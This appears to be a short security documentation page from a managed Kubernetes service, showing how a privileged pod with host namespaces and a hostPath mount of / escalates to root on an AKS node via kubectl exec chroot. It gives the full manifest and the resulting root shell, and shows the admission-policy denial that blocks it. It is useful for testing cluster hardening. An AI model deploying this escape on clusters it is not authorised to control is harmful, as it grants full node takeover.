Skip to main content

hack

tags:

  • security
  • policy
  • privileges

How to escalade privileges of a pod to be root in the node

Context

BY default, AKS allowed privileged pod. By using the following procedure, you can escalade your privileges to be root in the AKS node.

What to do ?

First deploy a basic cluster, with a dev namespace

Then, create a yaml file and copy past the following code.

$ cd /tmp
$ touch noderoot.yml

Content:

apiVersion: v1
kind: Pod
metadata:
  name: noderootpod
  labels:
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: noderootpod
    image: busybox
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /

Deploy it

$ kubectl apply -f noderoot.yml -n dev

If the k8saas is properly configured (ie policy module deployed), you should see an error like:

$ kubectl apply -f noderoot.yml -n dev
Error from server ([denied by azurepolicy-container-no-privilege-6134f47be9a69edbacdd] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}
[denied by azurepolicy-container-no-privilege-7f83897b6cbbf9956e71] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}): error when creating "noderoot.yml": admission webhook "validation.gatekeeper.sh" denied the request: [denied by azurepolicy-container-no-privilege-6134f47be9a69edbacdd] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}
[denied by azurepolicy-container-no-privilege-7f83897b6cbbf9956e71] Privileged container is not allowed: noderootpod, securityContext: {"privileged": true}

Otherwise, you can exploit the vulnerability using the following command that be chroot in the aks node:

loicjardin@TDS-Loics-MacBook-Pro /tmp % kubectl exec -it noderootpod chroot /host -n dev
kubectl exec [POD] [COMMAND] is DEPRECATED and will be removed in a future version. Use kubectl exec [POD] -- [COMMAND] instead.
root@aks-agentpool-12335712-vmss000000:/#

TADA :)